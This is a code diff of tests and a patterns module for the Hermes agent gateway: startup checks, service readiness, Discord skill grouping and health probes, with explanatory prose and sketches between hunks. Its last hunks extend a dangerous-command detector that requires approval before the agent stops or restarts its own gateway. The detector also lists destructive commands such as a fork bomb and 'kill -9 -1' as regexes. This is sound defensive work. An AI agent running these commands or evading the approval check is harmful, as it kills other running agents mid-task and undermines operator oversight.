@@ -132,6 +132,72 @@ class TestGatewayRuntimeStatus:
assert payload["platforms"]["discord"]["error_code"] is None
assert payload["platforms"]["discord"]["error_message"] is None
def test_reset_startup_checks_replaces_previous_run_entries(self, tmp_path, monkeypatch):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
status.write_runtime_status(
gateway_state="running",
startup_checks={
"old-check": {
"state": "ready",
"required": True,
"source": "old-hook",
"detail": None,
}
},
)
status.reset_startup_checks([
{
"name": "new-hook",
"startup_readiness": {
"id": "new-check",
"required": False,
},
}
])
payload = status.read_runtime_status()
assert set(payload["startup_checks"]) == {"new-check"}
assert payload["startup_checks"]["new-check"]["state"] == "pending"
assert payload["startup_checks"]["new-check"]["required"] is False
assert payload["startup_checks"]["new-check"]["source"] == "new-hook"
def test_mark_startup_check_ready_persists_detail(self, tmp_path, monkeypatch):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
status.reset_startup_checks([
{
"name": "beam",
"startup_readiness": {
"id": "beam-runtime",
"required": True,
},
}
])
status.mark_startup_check_ready("beam-runtime", detail="ready for RPC")
payload = status.read_runtime_status()
assert payload["startup_checks"]["beam-runtime"]["state"] == "ready"
assert payload["startup_checks"]["beam-runtime"]["detail"] == "ready for RPC"
def test_mark_startup_check_failed_creates_missing_entry(self, tmp_path, monkeypatch):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
status.mark_startup_check_failed(
"late-hook",
detail="startup hook crashed",
required=False,
source="late-hook",
)
payload = status.read_runtime_status()
assert payload["startup_checks"]["late-hook"]["state"] == "failed"
assert payload["startup_checks"]["late-hook"]["required"] is False
assert payload["startup_checks"]["late-hook"]["source"] == "late-hook"
assert payload["startup_checks"]["late-hook"]["detail"] == "startup hook crashed"
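The three status tests above pin down how startup checks behave. A reset replaces every entry from the previous run with one `pending` entry per hook that declares `startup_readiness`. Marking a check ready records its detail. Marking an undeclared check failed creates the entry on the fly. The following is a minimal in-memory sketch of those semantics, assuming plain dicts instead of the persisted runtime-status file. `reset_checks` and `mark_check` are hypothetical names, not the `gateway.status` API, and defaulting `required` to `False` when a hook omits it is an assumption.

```python
from typing import Any, Dict, Iterable, Optional

# Hypothetical in-memory stand-in for the "startup_checks" section of the
# runtime status; the real gateway.status helpers persist to disk.
StartupChecks = Dict[str, Dict[str, Any]]


def reset_checks(hooks: Iterable[Dict[str, Any]]) -> StartupChecks:
    """Build a fresh table: one pending entry per hook that declares readiness."""
    checks: StartupChecks = {}
    for hook in hooks:
        readiness = hook.get("startup_readiness")
        if not readiness:
            continue  # hooks without startup_readiness contribute no check
        checks[readiness["id"]] = {
            "state": "pending",
            # Assumption: a missing "required" key means the check is optional.
            "required": bool(readiness.get("required", False)),
            "source": hook.get("name"),
            "detail": None,
        }
    return checks


def mark_check(
    checks: StartupChecks,
    check_id: str,
    state: str,
    detail: Optional[str] = None,
    required: bool = False,
    source: Optional[str] = None,
) -> None:
    """Set a check's state, creating the entry if no hook declared it up front."""
    entry = checks.setdefault(
        check_id,
        {"state": "pending", "required": required, "source": source, "detail": None},
    )
    entry["state"] = state
    entry["detail"] = detail


checks = reset_checks([
    {"name": "beam", "startup_readiness": {"id": "beam-runtime", "required": True}},
    {"name": "plain-hook"},  # no readiness declaration, so no entry
])
mark_check(checks, "beam-runtime", "ready", detail="ready for RPC")
mark_check(checks, "late-hook", "failed", detail="startup hook crashed", source="late-hook")
```

Because the reset builds a new table rather than updating the old one, a check that a hook stopped declaring disappears instead of lingering as stale `ready` state from the previous run.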
class TestTerminatePid:
def test_force_uses_taskkill_on_windows(self, monkeypatch):
@@ -1028,3 +1028,154 @@ class TestDiscordSkillCommands:
assert len(name) <= _CMD_NAME_LIMIT, (
f"Name '{name}' is {len(name)} chars (limit {_CMD_NAME_LIMIT})"
)
# ---------------------------------------------------------------------------
# Discord skill commands grouped by category
# ---------------------------------------------------------------------------
from hermes_cli.commands import discord_skill_commands_by_category # noqa: E402
class TestDiscordSkillCommandsByCategory:
"""Tests for discord_skill_commands_by_category() — /skill group registration."""
def test_groups_skills_by_category(self, tmp_path, monkeypatch):
"""Skills nested 2+ levels deep should be grouped by top-level category."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
# Create the directory structure so resolve() works
for p in [
"skills/creative/ascii-art",
"skills/creative/excalidraw",
"skills/media/gif-search",
]:
(tmp_path / p).mkdir(parents=True, exist_ok=True)
(tmp_path / p / "SKILL.md").write_text("---\nname: test\n---\n")
fake_cmds = {
"/ascii-art": {
"name": "ascii-art",
"description": "Generate ASCII art",
"skill_md_path": f"{fake_skills_dir}/creative/ascii-art/SKILL.md",
},
"/excalidraw": {
"name": "excalidraw",
"description": "Hand-drawn diagrams",
"skill_md_path": f"{fake_skills_dir}/creative/excalidraw/SKILL.md",
},
"/gif-search": {
"name": "gif-search",
"description": "Search for GIFs",
"skill_md_path": f"{fake_skills_dir}/media/gif-search/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
assert "creative" in categories
assert "media" in categories
assert len(categories["creative"]) == 2
assert len(categories["media"]) == 1
assert uncategorized == []
assert hidden == 0
def test_root_level_skills_are_uncategorized(self, tmp_path, monkeypatch):
"""Skills directly under SKILLS_DIR (only 1 path component) → uncategorized."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
(tmp_path / "skills" / "dogfood").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / "dogfood" / "SKILL.md").write_text("")
fake_cmds = {
"/dogfood": {
"name": "dogfood",
"description": "QA testing",
"skill_md_path": f"{fake_skills_dir}/dogfood/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
assert categories == {}
assert len(uncategorized) == 1
assert uncategorized[0][0] == "dogfood"
def test_hub_skills_excluded(self, tmp_path, monkeypatch):
"""Skills under .hub should be excluded."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
(tmp_path / "skills" / ".hub" / "some-skill").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / ".hub" / "some-skill" / "SKILL.md").write_text("")
fake_cmds = {
"/some-skill": {
"name": "some-skill",
"description": "Hub skill",
"skill_md_path": f"{fake_skills_dir}/.hub/some-skill/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
assert categories == {}
assert uncategorized == []
def test_deep_nested_skills_use_top_category(self, tmp_path, monkeypatch):
"""Skills like mlops/training/axolotl should group under 'mlops'."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
(tmp_path / "skills" / "mlops" / "training" / "axolotl").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / "mlops" / "training" / "axolotl" / "SKILL.md").write_text("")
(tmp_path / "skills" / "mlops" / "inference" / "vllm").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / "mlops" / "inference" / "vllm" / "SKILL.md").write_text("")
fake_cmds = {
"/axolotl": {
"name": "axolotl",
"description": "Fine-tuning with Axolotl",
"skill_md_path": f"{fake_skills_dir}/mlops/training/axolotl/SKILL.md",
},
"/vllm": {
"name": "vllm",
"description": "vLLM inference",
"skill_md_path": f"{fake_skills_dir}/mlops/inference/vllm/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
# Both should be under 'mlops' regardless of sub-category
assert "mlops" in categories
names = {n for n, _d, _k in categories["mlops"]}
assert "axolotl" in names
assert "vllm" in names
assert len(uncategorized) == 0
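These tests encode the categorization rule from the commit message. The category is the first directory below `SKILLS_DIR`. Deeper nesting collapses onto that top-level directory. Skills directly under `SKILLS_DIR` are uncategorized, and anything under `.hub` is dropped. The following is a minimal sketch of that path rule alone, assuming POSIX-style paths. `classify_skill` is a hypothetical helper, not the body of `discord_skill_commands_by_category()`, which also handles disabled skills, reserved names, and Discord's limits.

```python
from pathlib import PurePosixPath
from typing import Optional, Tuple

HUB_DIR = ".hub"  # hub skills live under SKILLS_DIR/.hub in the tests above


def classify_skill(skill_md_path: str, skills_dir: str) -> Tuple[bool, Optional[str]]:
    """Return (include, category) for a skill's SKILL.md path.

    include is False for hub skills; category is the first directory under
    skills_dir, or None when the skill sits directly under skills_dir.
    Raises ValueError if the path is not inside skills_dir.
    """
    rel = PurePosixPath(skill_md_path).parent.relative_to(PurePosixPath(skills_dir))
    parts = rel.parts
    if parts and parts[0] == HUB_DIR:
        return False, None
    if len(parts) >= 2:
        # creative/ascii-art -> "creative"; mlops/training/axolotl -> "mlops"
        return True, parts[0]
    return True, None  # e.g. dogfood/ -> uncategorized, registered directly under /skill
```

Keying on the top-level directory alone keeps the number of subcommand groups bounded by the number of top-level folders, which matters given Discord's cap of 25 groups per command.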
@@ -6,12 +6,21 @@ from pathlib import Path
from types import SimpleNamespace
import hermes_cli.gateway as gateway_cli
import pytest
from gateway.restart import (
DEFAULT_GATEWAY_RESTART_DRAIN_TIMEOUT,
GATEWAY_SERVICE_RESTART_EXIT_CODE,
)
_REAL_AWAIT_SERVICE_READY = gateway_cli._await_service_ready_or_exit
@pytest.fixture(autouse=True)
def _stub_service_readiness(monkeypatch):
monkeypatch.setattr(gateway_cli, "_await_service_ready_or_exit", lambda **kwargs: None)
class TestSystemdServiceRefresh:
def test_systemd_install_repairs_outdated_unit_without_force(self, tmp_path, monkeypatch):
unit_path = tmp_path / "hermes-gateway.service"
@@ -82,6 +91,30 @@ class TestSystemdServiceRefresh:
["systemctl", "--user", "reload-or-restart", gateway_cli.get_service_name()],
]
def test_systemd_start_waits_for_readiness_before_reporting_success(self, monkeypatch):
calls = []
monkeypatch.setattr(gateway_cli, "_select_systemd_scope", lambda system=False: False)
monkeypatch.setattr(gateway_cli, "refresh_systemd_unit_if_needed", lambda system=False: calls.append(("refresh", system)))
monkeypatch.setattr(
gateway_cli,
"_run_systemctl",
lambda cmd, system=False, check=True, timeout=30, **kwargs: calls.append((tuple(cmd), system, timeout)),
)
monkeypatch.setattr(
gateway_cli,
"_await_service_ready_or_exit",
lambda **kwargs: calls.append(("ready", kwargs)),
)
gateway_cli.systemd_start()
assert calls == [
("refresh", False),
(("start", gateway_cli.get_service_name()), False, 30),
("ready", {"action": "start"}),
]
class TestGeneratedSystemdUnits:
def test_user_unit_avoids_recursive_execstop_and_uses_extended_stop_timeout(self):
@@ -268,6 +301,32 @@ class TestLaunchdServiceRecovery:
["launchctl", "kickstart", target],
]
def test_launchd_start_waits_for_readiness_before_reporting_success(self, tmp_path, monkeypatch):
plist_path = tmp_path / "ai.hermes.gateway.plist"
plist_path.write_text(gateway_cli.generate_launchd_plist(), encoding="utf-8")
label = gateway_cli.get_launchd_label()
calls = []
monkeypatch.setattr(gateway_cli, "get_launchd_plist_path", lambda: plist_path)
monkeypatch.setattr(gateway_cli, "refresh_launchd_plist_if_needed", lambda: None)
monkeypatch.setattr(
gateway_cli.subprocess,
"run",
lambda cmd, check=False, **kwargs: calls.append(cmd) or SimpleNamespace(returncode=0, stdout="", stderr=""),
)
monkeypatch.setattr(
gateway_cli,
"_await_service_ready_or_exit",
lambda **kwargs: calls.append(("ready", kwargs)),
)
gateway_cli.launchd_start()
assert calls == [
["launchctl", "kickstart", f"{gateway_cli._launchd_domain()}/{label}"],
("ready", {"action": "start"}),
]
def test_launchd_restart_drains_running_gateway_before_kickstart(self, monkeypatch):
calls = []
target = f"{gateway_cli._launchd_domain()}/{gateway_cli.get_launchd_label()}"
@@ -315,7 +374,7 @@ class TestLaunchdServiceRecovery:
gateway_cli.launchd_restart()
assert calls == [("self", 321)]
assert "restart requested" in capsys.readouterr().out.lower()
assert "service restarted" in capsys.readouterr().out.lower()
def test_launchd_stop_uses_bootout_not_kill(self, monkeypatch):
"""launchd_stop must bootout the service so KeepAlive doesn't respawn it."""
@@ -393,6 +452,109 @@ class TestLaunchdServiceRecovery:
assert "not loaded" in output.lower()
class TestGatewayServiceReadiness:
def test_wait_for_service_readiness_accepts_running_gateway_without_checks(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {"pid": 123, "gateway_state": "running", "startup_checks": {}},
)
warnings = gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
assert warnings == []
def test_wait_for_service_readiness_ignores_stale_runtime_state_until_pid_matches(self, monkeypatch):
runtime_states = iter(
[
{"pid": 999, "gateway_state": "running", "startup_checks": {}},
{"pid": 123, "gateway_state": "running", "startup_checks": {}},
]
)
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr("gateway.status.read_runtime_status", lambda: next(runtime_states))
warnings = gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
assert warnings == []
def test_wait_for_service_readiness_returns_optional_pending_warnings(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {
"pid": 123,
"gateway_state": "running",
"startup_checks": {
"optional-check": {
"state": "pending",
"required": False,
"source": "test-hook",
"detail": "still warming",
}
},
},
)
warnings = gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
assert warnings == ["pending: optional-check (test-hook): still warming"]
def test_wait_for_service_readiness_fails_when_required_check_fails(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {
"pid": 123,
"gateway_state": "running",
"startup_checks": {
"beam-runtime": {
"state": "failed",
"required": True,
"source": "beam",
"detail": "RPC boot failed",
}
},
},
)
with pytest.raises(RuntimeError, match=r"required startup checks failed: beam-runtime \(beam\): RPC boot failed"):
gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
def test_wait_for_service_readiness_times_out_on_pending_required_check(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {
"pid": 123,
"gateway_state": "running",
"startup_checks": {
"beam-runtime": {
"state": "pending",
"required": True,
"source": "beam",
"detail": "waiting for runtime",
}
},
},
)
with pytest.raises(RuntimeError, match=r"timed out waiting for required startup checks: beam-runtime \(beam\): waiting for runtime"):
gateway_cli._wait_for_service_readiness(action="start", timeout=0.01, poll_interval=0.0)
def test_await_service_ready_or_exit_raises_system_exit_when_not_ready(self, monkeypatch):
monkeypatch.setattr(gateway_cli, "_await_service_ready_or_exit", _REAL_AWAIT_SERVICE_READY)
monkeypatch.setattr(
gateway_cli,
"_wait_for_service_readiness",
lambda **kwargs: (_ for _ in ()).throw(RuntimeError("not ready")),
)
with pytest.raises(SystemExit, match="1"):
gateway_cli._await_service_ready_or_exit(action="start")
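The readiness tests above describe a polling contract. Runtime status written by an older process is ignored until its PID matches the live one. Optional checks that are not ready become warnings. A failed required check aborts immediately, and a required check still pending at the deadline is a timeout. The following is a minimal sketch under those assumptions. `wait_for_readiness` takes the PID and status readers as arguments, a hypothetical signature chosen for testability rather than the real `_wait_for_service_readiness`. The tests do not cover how an optional check that *failed* should be treated; reporting it as a warning is a guess.

```python
import time
from typing import Any, Callable, Dict, List, Optional


def _describe(check_id: str, check: Dict[str, Any]) -> str:
    # Render "id (source): detail", matching the messages asserted in the tests.
    text = f"{check_id} ({check.get('source')})"
    if check.get("detail"):
        text += f": {check['detail']}"
    return text


def wait_for_readiness(
    get_pid: Callable[[], Optional[int]],
    read_status: Callable[[], Optional[Dict[str, Any]]],
    timeout: float = 30.0,
    poll_interval: float = 0.5,
) -> List[str]:
    """Poll until the live gateway is running with all required checks ready.

    Returns warnings for optional checks that are not ready; raises
    RuntimeError if a required check failed or the deadline passes first.
    """
    deadline = time.monotonic() + timeout
    waiting_on: List[str] = []
    while True:
        pid = get_pid()
        status = read_status() or {}
        # Skip status left behind by a previous process until the PID matches.
        if pid is not None and status.get("pid") == pid and status.get("gateway_state") == "running":
            checks = status.get("startup_checks") or {}
            required = {k: v for k, v in checks.items() if v.get("required")}
            failed = [_describe(k, v) for k, v in required.items() if v.get("state") == "failed"]
            if failed:
                raise RuntimeError("required startup checks failed: " + "; ".join(failed))
            waiting_on = [_describe(k, v) for k, v in required.items() if v.get("state") != "ready"]
            if not waiting_on:
                return [
                    f"{v.get('state')}: {_describe(k, v)}"
                    for k, v in checks.items()
                    if not v.get("required") and v.get("state") != "ready"
                ]
        if time.monotonic() >= deadline:
            if waiting_on:
                raise RuntimeError(
                    "timed out waiting for required startup checks: " + "; ".join(waiting_on)
                )
            raise RuntimeError("timed out waiting for the gateway to report running")
        time.sleep(poll_interval)
```

Failing fast on a `failed` required check, instead of waiting out the timeout, lets `systemd_start()` or `launchd_start()` report the real cause right away.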
class TestGatewayServiceDetection:
def test_supports_systemd_services_requires_systemctl_binary(self, monkeypatch):
monkeypatch.setattr(gateway_cli, "is_linux", lambda: True)
@@ -475,7 +637,7 @@ class TestGatewaySystemServiceRouting:
gateway_cli.systemd_restart()
assert calls == [("refresh", False), ("self", 654)]
assert "restart requested" in capsys.readouterr().out.lower()
assert "service restarted" in capsys.readouterr().out.lower()
def test_gateway_install_passes_system_flags(self, monkeypatch):
monkeypatch.setattr(gateway_cli, "supports_systemd_services", lambda: True)
@@ -984,3 +984,195 @@ class TestModelInfoEndpoint:
assert resp.status_code == 200
data = resp.json()
assert data["auto_context_length"] == 0
# ---------------------------------------------------------------------------
# Gateway health probe tests
# ---------------------------------------------------------------------------
class TestProbeGatewayHealth:
"""Tests for _probe_gateway_health() — cross-container gateway detection."""
def test_returns_false_when_no_url_configured(self, monkeypatch):
"""When GATEWAY_HEALTH_URL is unset, the probe returns (False, None)."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", None)
alive, body = ws._probe_gateway_health()
assert alive is False
assert body is None
def test_normalizes_url_with_health_suffix(self, monkeypatch):
"""If the user sets the URL to include /health, it's stripped to base."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642/health")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
# Both paths should fail (no server), but we verify they were constructed
# correctly by checking the URLs attempted.
calls = []
original_urlopen = ws.urllib.request.urlopen
def mock_urlopen(req, **kwargs):
calls.append(req.full_url)
raise ConnectionError("mock")
monkeypatch.setattr(ws.urllib.request, "urlopen", mock_urlopen)
alive, body = ws._probe_gateway_health()
assert alive is False
assert "http://gw:8642/health/detailed" in calls
assert "http://gw:8642/health" in calls
def test_normalizes_url_with_health_detailed_suffix(self, monkeypatch):
"""If the user sets the URL to include /health/detailed, it's stripped to base."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642/health/detailed")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
calls = []
def mock_urlopen(req, **kwargs):
calls.append(req.full_url)
raise ConnectionError("mock")
monkeypatch.setattr(ws.urllib.request, "urlopen", mock_urlopen)
ws._probe_gateway_health()
assert "http://gw:8642/health/detailed" in calls
assert "http://gw:8642/health" in calls
def test_successful_detailed_probe(self, monkeypatch):
"""Successful /health/detailed probe returns (True, body_dict)."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
response_body = json.dumps({
"status": "ok",
"gateway_state": "running",
"pid": 42,
})
mock_resp = MagicMock()
mock_resp.status = 200
mock_resp.read.return_value = response_body.encode()
mock_resp.__enter__ = MagicMock(return_value=mock_resp)
mock_resp.__exit__ = MagicMock(return_value=False)
monkeypatch.setattr(ws.urllib.request, "urlopen", lambda req, **kw: mock_resp)
alive, body = ws._probe_gateway_health()
assert alive is True
assert body["status"] == "ok"
assert body["pid"] == 42
def test_detailed_fails_falls_back_to_simple_health(self, monkeypatch):
"""If /health/detailed fails, falls back to /health."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
call_count = [0]
def mock_urlopen(req, **kwargs):
call_count[0] += 1
if call_count[0] == 1:
raise ConnectionError("detailed failed")
mock_resp = MagicMock()
mock_resp.status = 200
mock_resp.read.return_value = json.dumps({"status": "ok"}).encode()
mock_resp.__enter__ = MagicMock(return_value=mock_resp)
mock_resp.__exit__ = MagicMock(return_value=False)
return mock_resp
monkeypatch.setattr(ws.urllib.request, "urlopen", mock_urlopen)
alive, body = ws._probe_gateway_health()
assert alive is True
assert body["status"] == "ok"
assert call_count[0] == 2
class TestStatusRemoteGateway:
"""Tests for /api/status with remote gateway health fallback."""
@pytest.fixture(autouse=True)
def _setup_test_client(self):
try:
from starlette.testclient import TestClient
except ImportError:
pytest.skip("fastapi/starlette not installed")
from hermes_cli.web_server import app, _SESSION_TOKEN
self.client = TestClient(app)
self.client.headers["Authorization"] = f"Bearer {_SESSION_TOKEN}"
def test_status_falls_back_to_remote_probe(self, monkeypatch):
"""When local PID check fails and remote probe succeeds, gateway shows running."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: None)
monkeypatch.setattr(ws, "read_runtime_status", lambda: None)
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_probe_gateway_health", lambda: (True, {
"status": "ok",
"gateway_state": "running",
"platforms": {"telegram": {"state": "connected"}},
"pid": 999,
}))
resp = self.client.get("/api/status")
assert resp.status_code == 200
data = resp.json()
assert data["gateway_running"] is True
assert data["gateway_pid"] == 999
assert data["gateway_state"] == "running"
def test_status_remote_probe_not_attempted_when_local_pid_found(self, monkeypatch):
"""When local PID check succeeds, the remote probe is never called."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: 1234)
monkeypatch.setattr(ws, "read_runtime_status", lambda: {
"gateway_state": "running",
"platforms": {},
})
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
probe_called = [False]
original = ws._probe_gateway_health
def track_probe():
probe_called[0] = True
return original()
monkeypatch.setattr(ws, "_probe_gateway_health", track_probe)
resp = self.client.get("/api/status")
assert resp.status_code == 200
assert not probe_called[0]
def test_status_remote_probe_not_attempted_when_no_url(self, monkeypatch):
"""When GATEWAY_HEALTH_URL is unset, no probe is attempted."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: None)
monkeypatch.setattr(ws, "read_runtime_status", lambda: None)
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", None)
resp = self.client.get("/api/status")
assert resp.status_code == 200
data = resp.json()
assert data["gateway_running"] is False
def test_status_remote_running_null_pid(self, monkeypatch):
"""Remote gateway running but PID not in response — pid should be None."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: None)
monkeypatch.setattr(ws, "read_runtime_status", lambda: None)
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_probe_gateway_health", lambda: (True, {
"status": "ok",
}))
resp = self.client.get("/api/status")
assert resp.status_code == 200
data = resp.json()
assert data["gateway_running"] is True
assert data["gateway_pid"] is None
assert data["gateway_state"] == "running"
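The probe tests above fix two behaviors of the cross-container check. A configured URL that already ends in `/health` or `/health/detailed` is reduced to its base. The probe then tries `/health/detailed` first and falls back to `/health`, returning `(alive, body)`. The following is a minimal sketch of that logic using `urllib.request`. `gateway_base_url`, `probe_gateway_health`, the injectable `opener` parameter, and the 3-second default timeout are all assumptions for illustration, not the actual `_probe_gateway_health` signature.

```python
import json
import urllib.request
from typing import Any, Callable, Optional, Tuple


def gateway_base_url(url: str) -> str:
    """Strip a trailing /health or /health/detailed so both forms give the same base."""
    base = url.rstrip("/")
    for suffix in ("/health/detailed", "/health"):  # longest suffix first
        if base.endswith(suffix):
            return base[: -len(suffix)]
    return base


def probe_gateway_health(
    url: Optional[str],
    timeout: float = 3.0,
    opener: Callable[..., Any] = urllib.request.urlopen,
) -> Tuple[bool, Optional[dict]]:
    """Try /health/detailed, then /health; return (alive, parsed JSON body)."""
    if not url:
        return False, None  # no GATEWAY_HEALTH_URL configured: nothing to probe
    base = gateway_base_url(url)
    for path in ("/health/detailed", "/health"):
        request = urllib.request.Request(base + path)
        try:
            with opener(request, timeout=timeout) as resp:
                if resp.status == 200:
                    return True, json.loads(resp.read().decode("utf-8"))
        except Exception:
            continue  # refused connection, timeout or bad JSON: try the next path
    return False, None
```

Checking the longer suffix first matters: with `/health` tested first, `http://gw:8642/health/detailed` would not be recognized, and the probe would request `.../health/detailed/health/detailed`.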
@@ -550,11 +550,12 @@ class TestGatewayProtection:
dangerous, key, desc = detect_dangerous_command(cmd)
assert dangerous is False
def test_systemctl_restart_not_flagged(self):
"""Using systemctl to manage the gateway is the correct approach."""
def test_systemctl_restart_flagged(self):
"""systemctl restart kills running agents and should require approval."""
cmd = "systemctl --user restart hermes-gateway"
dangerous, key, desc = detect_dangerous_command(cmd)
assert dangerous is False
assert dangerous is True
assert "stop/restart" in desc
def test_pkill_hermes_detected(self):
"""pkill targeting hermes/gateway processes must be caught."""
@@ -2837,7 +2837,7 @@ class TestRegistryCollisionWarning:
"""registry.register() warns when a tool name is overwritten by a different toolset."""
def test_overwrite_different_toolset_logs_warning(self, caplog):
"""Overwriting a tool from a different toolset emits a warning."""
"""Overwriting a tool from a different toolset is REJECTED with an error."""
from tools.registry import ToolRegistry
import logging
@@ -2847,11 +2847,13 @@ class TestRegistryCollisionWarning:
reg.register(name="my_tool", toolset="builtin", schema=schema, handler=handler)
with caplog.at_level(logging.WARNING, logger="tools.registry"):
with caplog.at_level(logging.ERROR, logger="tools.registry"):
reg.register(name="my_tool", toolset="mcp-ext", schema=schema, handler=handler)
assert any("collision" in r.message.lower() for r in caplog.records)
assert any("rejected" in r.message.lower() for r in caplog.records)
assert any("builtin" in r.message and "mcp-ext" in r.message for r in caplog.records)
# The original tool should still be from 'builtin', not overwritten
assert reg.get_toolset_for_tool("my_tool") == "builtin"
def test_overwrite_same_toolset_no_warning(self, caplog):
"""Re-registering within the same toolset is silent (e.g. reconnect)."""
@@ -87,7 +87,7 @@ DANGEROUS_PATTERNS = [
(r'\bDELETE\s+FROM\b(?!.*\bWHERE\b)', "SQL DELETE without WHERE"),
(r'\bTRUNCATE\s+(TABLE)?\s*\w', "SQL TRUNCATE"),
(r'>\s*/etc/', "overwrite system config"),
(r'\bsystemctl\s+(stop|disable|mask)\b', "stop/disable system service"),
(r'\bsystemctl\s+(-[^\s]+\s+)*(stop|restart|disable|mask)\b', "stop/restart system service"),
(r'\bkill\s+-9\s+-1\b', "kill all processes"),
(r'\bpkill\s+-9\b', "force kill processes"),
(r':\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:', "fork bomb"),
@@ -101,6 +101,11 @@ DANGEROUS_PATTERNS = [
(r'\bxargs\s+.*\brm\b', "xargs with rm"),
(r'\bfind\b.*-exec\s+(/\S*/)?rm\b', "find -exec rm"),
(r'\bfind\b.*-delete\b', "find -delete"),
# Gateway lifecycle protection: prevent the agent from killing its own
# gateway process. These commands trigger a gateway restart/stop that
# terminates all running agents mid-work.
(r'\bhermes\s+gateway\s+(stop|restart)\b', "stop/restart hermes gateway (kills running agents)"),
(r'\bhermes\s+update\b', "hermes update (restarts gateway, kills running agents)"),
# Gateway protection: never start gateway outside systemd management
(r'gateway\s+run\b.*(&\s*$|&\s*;|\bdisown\b|\bsetsid\b)', "start gateway outside systemd (use 'systemctl --user restart hermes-gateway')"),
(r'\bnohup\b.*gateway\s+run\b', "start gateway outside systemd (use 'systemctl --user restart hermes-gateway')"),
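The widened `systemctl` pattern adds `restart` and inserts the optional group `(-[^\s]+\s+)*`, so flags such as `--user` can sit between `systemctl` and the verb. The old pattern missed both `systemctl --user stop ...` and every `restart`, which is why `test_systemctl_restart_flagged` flips its expectation. The sketch below runs three of the new entries, copied verbatim, through plain `re.search`. `first_match` is a hypothetical helper. How `detect_dangerous_command` actually applies the list (regex flags, normalization, ordering) is not shown in this diff.

```python
import re
from typing import Optional

# Three DANGEROUS_PATTERNS entries from the diff above, copied verbatim.
GATEWAY_PATTERNS = [
    (r'\bsystemctl\s+(-[^\s]+\s+)*(stop|restart|disable|mask)\b', "stop/restart system service"),
    (r'\bhermes\s+gateway\s+(stop|restart)\b', "stop/restart hermes gateway (kills running agents)"),
    (r'\bhermes\s+update\b', "hermes update (restarts gateway, kills running agents)"),
]


def first_match(command: str) -> Optional[str]:
    """Return the description of the first pattern that matches, else None."""
    for pattern, description in GATEWAY_PATTERNS:
        if re.search(pattern, command):
            return description
    return None
```

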